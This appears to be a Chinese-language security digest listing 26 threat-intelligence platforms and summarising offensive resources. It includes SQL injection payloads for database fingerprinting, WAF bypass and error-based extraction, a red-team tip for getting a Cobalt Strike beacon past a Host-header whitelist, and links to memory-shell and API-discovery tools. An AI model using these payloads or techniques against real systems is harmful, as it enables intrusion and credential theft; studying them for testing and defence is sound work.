Quan


WEB安全 内网安全 终端对抗 威胁情报 搜索内容
威胁情报
26个情报相关的网址
1. 微步X 微步在线X情报社区-威胁情报查询_威胁分析平台_开放社区 
2. 安恒星图 安全星图平台
3. 奇安信 奇安信威胁情报中心
4. 情报星球 情报星球 - 安全情报交流与分享社区
5. 天际友盟RedQueen安全智能服务平台 RedQueen威胁情报中心 
6. VenusEye威胁情报中心 VenusEye威胁情报中心
7. 绿盟NTI 威胁情报中心 NTI - 威胁情报中心
8. 360威胁情报中心 360安全大脑
9. 安天威胁情报中心 https://www.antiycloud.com/
10. IBM X-Force IBM X-Force Exchange
11. VirusTotal VirusTotal
12. SANS互联网风暴中心 SANS.edu Internet Storm Center - SANS Internet Storm Center 
13. Threatcrowd 开源威胁情报 https://www.threatcrowd.org/ 
14. ThreatMiner ThreatMiner.org | Data Mining for Threat Intelligence 
15. GreyNoise GreyNoise is the source for understanding internet noise
16. CT Stack安全社区 CT Stack 安全社区
17. 腾讯安全 https://tix.qq.com/ 
18. CNTD网络安全威胁情报共享平台 CNTD网络安全威胁情报共享平台 
19. 海豚情报助手 海豚威胁情报平台
20. 先知 技术文章 - 先知社区 
21. 深信服 https://ti.sangfor.com.cn/analysis-platform
22. 鹰眼毒霸 鹰眼威胁情报 
23. 山石云瞻 Loading 
24. BadIP https://www.badip.com/
25. MISP 开源威胁情报共享平台 GitHub - MISP/MISP: MISP (core software) - Open Source Threat Intelligence Platform
26. 威胁情报管理平台 https://ti.watcherlab.com/#/search

https://www.redteam.wang
WEB安全
高级SQL注入技术
感觉比较精髓的地方在于:
1.介绍了一下如何利用不同的语句来判断后端数据库此问题可能有时候会被当做面试题来问
MYSQL:
' OR 1=1 AND @@version --
PostgreSQL
' OR 1=1 AND version() --
MSSQL
' OR 1=1 AND @@version --
2.绕WAF技术中可以使用||来拼接字符串
' UNION SELECT CHAR(117)||CHAR(115)||CHAR(101)||CHAR(114), CHAR(112)||CHAR(97)||CHAR(115)||CHAR(115) --
或是
' UNION SELECT 'ad'||'min', 'pa'||'ss' --
3.不同的后端数据库报错函数也不尽相同:
MYSQL
' UNION SELECT GTID_SUBSET('abc', 'def') --
pg
' UNION SELECT TO_NUMBER('abc', '999') --
MSSQL
' UNION SELECT CONVERT(INT, 'abc') --
总结:当个备忘录不错,大致阅读了一下,从中提取了一些比较精髓的东西。

https://github.com/ynsmroztas/SQL_Injection-Techniques
内网渗透
记一次供应链+社工技术通关某金融演练单位
精彩的地方在于 
1.如何最大化的利用云服务器资产来扩大攻击面
水坑钓鱼
2.如何在有AC的情况下,上线CS
简单的信息收集后,发现使用了某安全厂商的ac上网设备,pc终端输入账号密码通过ac认证后可以访问互联网,而限制用户能否访问目标网站,一般都是通过配置http host头白名单来实现。

试了下公司官网,http可以正常访问,所以cs listener中配置host为公司官网域名,成功http上线。

https://mp.weixin.qq.com/s/ThiChVEU_ub0U5m1fu3o0A
WEB安全
一个收集如何打入内存马方式的项目
看着还不错,里面介绍了一些内存马打入的方式,比如Freemarker等等...

https://github.com/achuna33/Memoryshell-JavaALL
WEB安全
自动化发现接口并测试的Burp插件
攻防演练过程中,我们通常会用浏览器访问一些资产,但很多未授权/敏感信息/越权隐匿在已访问接口过html、JS文件等,该插件能让我们发现未授权/敏感信息/越权/登陆接口等。

发现通过某接口可以进行未授权/越权获取到所有的账号密码、私钥、凭证
发现通过某接口可以枚举用户信息、密码修改、用户创建接口
发现登陆后台网址
发现在html、JS中泄漏账号密码或者云主机的Access Key和SecretKey
...

功能

提取网站的URL链接和解析JS文件中的URL链接
前端界面可自行定义敏感关键词、敏感url匹配
界面可配置的开启主动接口探测、敏感信息获取
集成主流攻防场景敏感信息泄漏的指纹库

指纹大杂烩了属于是,来自HAE、APIKET、SweetPotato
还没用,回来试试

https://github.com/shuanx/BurpAPIFinder